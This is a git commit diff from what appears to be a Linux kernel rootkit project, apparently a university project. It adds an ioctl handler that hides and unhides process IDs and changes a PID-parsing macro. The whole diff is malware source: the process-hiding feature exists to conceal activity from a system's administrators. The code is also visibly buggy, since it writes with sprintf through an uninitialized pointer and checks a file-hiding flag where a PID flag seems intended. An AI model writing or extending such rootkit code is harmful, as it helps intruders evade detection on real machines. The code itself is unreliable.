commit 9e022750c9d494742ad7969f3ccdb0027b5f0825
parent 44190c61724e59f8e0b54deb09b4ac1f705998e6
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 29 Nov 2020 11:39:23 +0100
implements {,un}hidepid handling
Diffstat:
2 files changed, 23 insertions(+), 1 deletion(-)
diff --git a/src/channel.c b/src/channel.c
@@ -7,6 +7,7 @@
#include "common.h"
#include "filehide.h"
#include "backdoor.h"
+#include "hidepid.h"
#include "ioctl.h"
#include "rootkit.h"
@@ -133,6 +134,27 @@ handle_togglebd(unsigned long arg)
int
handle_hidepid(unsigned long arg)
{
+ char *msg;
+ long sarg = (long)arg;
+
+ if (!sarg) {
+ unhide_pids();
+ rootkit.hiding_pids = false;
+ msg = "hidepid off";
+ } else if (sarg < 0) {
+ unhide_pid((pid_t)((-1) * sarg));
+ sprintf(msg, "unhiding pid %d", (pid_t)((-1) * sarg));
+ } else if (sarg > 0) {
+ if (!rootkit.hiding_files) {
+ DEBUG_NOTICE("hidepid on\n");
+ rootkit.hiding_pids = true;
+ }
+
+ hide_pid((pid_t)sarg);
+ sprintf(msg, "hiding pid %d", (pid_t)sarg);
+ }
+
+ DEBUG_NOTICE("%s\n", msg);
return 0;
}
diff --git a/src/hidepid.h b/src/hidepid.h
@@ -3,7 +3,7 @@
#include <linux/types.h>
-#define PID_FROM_NAME(name) (simple_strtoul((name), NULL, 10))
+#define PID_FROM_NAME(name) ((pid_t)simple_strtol((name), NULL, 10))
typedef struct pid_list *pid_list_t_ptr;
typedef struct pid_list {
